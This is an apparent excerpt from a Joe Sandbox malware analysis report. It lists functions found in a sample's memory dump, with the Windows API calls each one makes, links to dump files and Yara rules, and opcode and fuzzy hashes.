                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                  • Opcode ID: 9f4a07599a5099fdcd64fe0a492bd257d56d373cf7efa675eb22477e9cddd7b7
                                                                                                                                                                  • Instruction ID: f971773b4cd2986fbc7fb7e6b1d69d39358d704ae9006c4baf67cbf430db32fd
                                                                                                                                                                  • Opcode Fuzzy Hash: 9f4a07599a5099fdcd64fe0a492bd257d56d373cf7efa675eb22477e9cddd7b7
                                                                                                                                                                  • Instruction Fuzzy Hash: 01018070244348BFF3345E258C8AF6A7ADCAB05768F108759FAE55A1E0C7B45C448B14
                                                                                                                                                                  Function 001FF26B Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0022AEA5,?,?,00000000,00000008), ref: 001FF282
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0022AEA5,?,?,00000000,00000008), ref: 001FF2A6
                                                                                                                                                                    • Part of subcall function 001FF2D0: _memmove.LIBCMT ref: 001FF307
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3033907384-0
                                                                                                                                                                  • Opcode ID: 7e4fa9d3ad0b4d36c9fa72039386809df3eb57076bd08122460528a6b7b8550e
                                                                                                                                                                  • Instruction ID: cb203c92768bb9994e9bf5869a3ce1cd7521f6b8c60565ea848bef4662447289
                                                                                                                                                                  • Opcode Fuzzy Hash: 7e4fa9d3ad0b4d36c9fa72039386809df3eb57076bd08122460528a6b7b8550e
                                                                                                                                                                  • Instruction Fuzzy Hash: D8F044B65145187FAB11ABA5EC88D7B7FADEF463607008029FD0CCA151C671DC01C671
                                                                                                                                                                  Function 0020F782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___lock_fhandle.LIBCMT ref: 0020F7D9
                                                                                                                                                                  • __close_nolock.LIBCMT ref: 0020F7F2
                                                                                                                                                                    • Part of subcall function 0020886A: __getptd_noexit.LIBCMT ref: 0020886A
                                                                                                                                                                    • Part of subcall function 0020889E: __getptd_noexit.LIBCMT ref: 0020889E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1046115767-0
                                                                                                                                                                  • Opcode ID: bfe641644f3720fc62833022e0fa25dfbf8b9888f1fa7f611a453931298401e1
                                                                                                                                                                  • Instruction ID: 0d682388a1fc12b5c9db75b63112df7928dd2615b1d527c2dd9695ca01100d1e
                                                                                                                                                                  • Opcode Fuzzy Hash: bfe641644f3720fc62833022e0fa25dfbf8b9888f1fa7f611a453931298401e1
                                                                                                                                                                  • Instruction Fuzzy Hash: 9E110232C757148FD7A1BF64994538977905F42330F5A8360E4A02F5E3CBB46D208EA1
                                                                                                                                                                  Function 00239500 Relevance: 3.0, APIs: 2, Instructions: 46networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • send.WS2_32(00000000,?,00000000,00000000), ref: 00239534
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00239557
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastsend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1802528911-0
                                                                                                                                                                  • Opcode ID: 3dc1c679fa30f8b37ec4a4f3d1c44f777fb6d503fe9405869ca1224c31c69be3
                                                                                                                                                                  • Instruction ID: 4b9d62203abd0e45f86d91563547937962d3873bc511a69099bb7d30970a0e61
                                                                                                                                                                  • Opcode Fuzzy Hash: 3dc1c679fa30f8b37ec4a4f3d1c44f777fb6d503fe9405869ca1224c31c69be3
                                                                                                                                                                  • Instruction Fuzzy Hash: B4017C75310204AFC710EF68D891B6AB7E9EB99720F118129E65A8B391CBB0EC45CB91
                                                                                                                                                                  Function 00204274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0020889E: __getptd_noexit.LIBCMT ref: 0020889E
                                                                                                                                                                  • __lock_file.LIBCMT ref: 002042B9
                                                                                                                                                                    • Part of subcall function 00205A9F: __lock.LIBCMT ref: 00205AC2
                                                                                                                                                                  • __fclose_nolock.LIBCMT ref: 002042C4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2800547568-0
                                                                                                                                                                  • Opcode ID: 2fbb2eebcced90c722e23ed6f87b431cae6780eaba4f1057e9b0dafb8f633ed7
                                                                                                                                                                  • Instruction ID: 819868be5a82d573a622442d0f721f666255d08d528f6fea61abb68e479bc00a
                                                                                                                                                                  • Opcode Fuzzy Hash: 2fbb2eebcced90c722e23ed6f87b431cae6780eaba4f1057e9b0dafb8f633ed7
                                                                                                                                                                  • Instruction Fuzzy Hash: 26F090B1E317159EE711BB75880275EA7E06F41334F25C20ABD649B1C3CBB899219F51
                                                                                                                                                                  Function 001FF55E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • timeGetTime.WINMM ref: 001FF57A
                                                                                                                                                                    • Part of subcall function 001EE1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001EE279
                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 002575D3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePeekSleepTimetime
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1792118007-0
                                                                                                                                                                  • Opcode ID: 32f67f51a2887561ceca19eebabe95890d1171f8860711dc8c805070de235a18
                                                                                                                                                                  • Instruction ID: c813832027161292c00d156b4774583066d600a6d9941a27042b204a7eda0737
                                                                                                                                                                  • Opcode Fuzzy Hash: 32f67f51a2887561ceca19eebabe95890d1171f8860711dc8c805070de235a18
                                                                                                                                                                  • Instruction Fuzzy Hash: 3EF082712406189FD314EF69D805B9ABBE8BF58311F00402AF81AC7251DBB06940CBD1
                                                                                                                                                                  Function 001E81C6 Relevance: 1.9, APIs: 1, Instructions: 438COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                  • __wcsnicmp.LIBCMT ref: 001E83C4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __itow__swprintf__wcsnicmp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 712828618-0
                                                                                                                                                                  • Opcode ID: 4774ebe45454ccd5e61ca601947f7bc710b3c6367f6404d2ed68767689bd55da
                                                                                                                                                                  • Instruction ID: 54290b47748516e0dd98a53bd7ab29ab0378b77c41ceb42061b022c4ffd8a253
                                                                                                                                                                  • Opcode Fuzzy Hash: 4774ebe45454ccd5e61ca601947f7bc710b3c6367f6404d2ed68767689bd55da
                                                                                                                                                                  • Instruction Fuzzy Hash: E7F17C71508742AFC704EF19C89196FBBE5FF98304F54891DF98997261EB30EA09CB92
                                                                                                                                                                  Function 001F4040 Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                                                                  • Instruction ID: eaa2172704c6832ac1de13b43001be240d839f20a6435d12397b8f58f31b712a
                                                                                                                                                                  • Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                                                                  • Instruction Fuzzy Hash: 2B61C2B4A0420A9FDB14DF54C884ABBF7E4FF18310F108269EA1AC7291D771ECA5CB91
                                                                                                                                                                  Function 001FEF0D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 4e1bb3d73d12ae5d9428c68f164e874ffc716177156c0fbb65594071fa88fbbc
                                                                                                                                                                  • Instruction ID: f365eafc6d7ce0a53a5cd9903ca8015fd29a51fa8e8e9cefba65123ac0ea2e22
                                                                                                                                                                  • Opcode Fuzzy Hash: 4e1bb3d73d12ae5d9428c68f164e874ffc716177156c0fbb65594071fa88fbbc
                                                                                                                                                                  • Instruction Fuzzy Hash: 3B51E835610605AFCF04EFA8C991EBD77E6AF59310B144069FA069F392CB30ED16DB40
                                                                                                                                                                  Function 001EB6D0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                                  • Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                                                                  • Instruction ID: 908a8d555b248956dfcec2ffe5efcfc3ada4cafbbb96a33a89bdc6de2bda6650
                                                                                                                                                                  • Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                                                                  • Instruction Fuzzy Hash: B141AC79604A02CFC314DF1AC481A26F7F0FF89361715C42EE89A87BA1D730E861CB51
                                                                                                                                                                  Function 001E4EE9 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 001E4F8F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                                  • Opcode ID: eae929d373b67d42e2dfc88e9c2c2d9c71c555f7fd91c8891f38747f6a84b208
                                                                                                                                                                  • Instruction ID: 8a9f1269cdcbf5ad63706ad43c36f6f48234eeab43d322e8a5d515bfa7755d2b
                                                                                                                                                                  • Opcode Fuzzy Hash: eae929d373b67d42e2dfc88e9c2c2d9c71c555f7fd91c8891f38747f6a84b208
                                                                                                                                                                  • Instruction Fuzzy Hash: 9F315C31A10A96AFCB08DF6EC484AADB7B5BF48710F158629E81993710D770BDA0CBD0
                                                                                                                                                                  Function 001FF92C Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: select
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1274211008-0
                                                                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                  • Instruction ID: efea2e95d0fe48bd637f89fbe6bdaa4b6a6546ab11c6121979b06795f84d13b7
                                                                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                  • Instruction Fuzzy Hash: E2310870A0010AEBC708DF58C480A79F7A1FF49304B6582A9E549DB255D7B0EDC2CBD0
                                                                                                                                                                  Function 0025AA5A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                                  • Opcode ID: a89ee695fc463ffbc1fce1673ed96a606c66e36ab596baa3a94d084e7113277b
                                                                                                                                                                  • Instruction ID: 6e2383245a51bf944d3f077098d7d199f9c4197b94a2a89bf3b269a13a730a73
                                                                                                                                                                  • Opcode Fuzzy Hash: a89ee695fc463ffbc1fce1673ed96a606c66e36ab596baa3a94d084e7113277b
                                                                                                                                                                  • Instruction Fuzzy Hash: 4E415B74504655CFEB25CF18C484B2ABBE1BF49308F19859CEA994B362D372F885CF52
                                                                                                                                                                  Function 001EBD71 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
